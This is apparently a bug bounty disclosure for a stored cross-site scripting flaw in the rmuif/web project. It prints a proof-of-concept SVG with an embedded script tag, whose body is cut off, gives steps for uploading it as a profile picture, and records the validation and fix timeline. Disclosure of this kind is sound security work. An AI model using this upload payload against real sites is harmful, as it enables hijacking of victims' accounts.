Cross-site Scripting (XSS) - Stored in rmuif/web


Reported on

Oct 20th 2021


rmuif is vulnerable to XSS. It is possible to use <script> tags in SVG content when uploading a profile picture.

Proof of Concept

SVG content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">

<svg version="1.1" baseProfile="full" xmlns="">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">

1: Save the above content into an SVG file.

2: Access the settings page and upload this file as a profile picture.

3: Access the target file URL.

PoC video.


This vulnerability is capable of executing arbitrary JS code to perform actions which may compromise the victim's account.


We have contacted a member of the rmuif/web team and are waiting to hear back 2 years ago
rmuif/web maintainer validated this vulnerability 2 years ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
rmuif/web maintainer marked this as fixed with commit daa247 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
AccountTab.js#L141-L186 has been validated
to join this conversation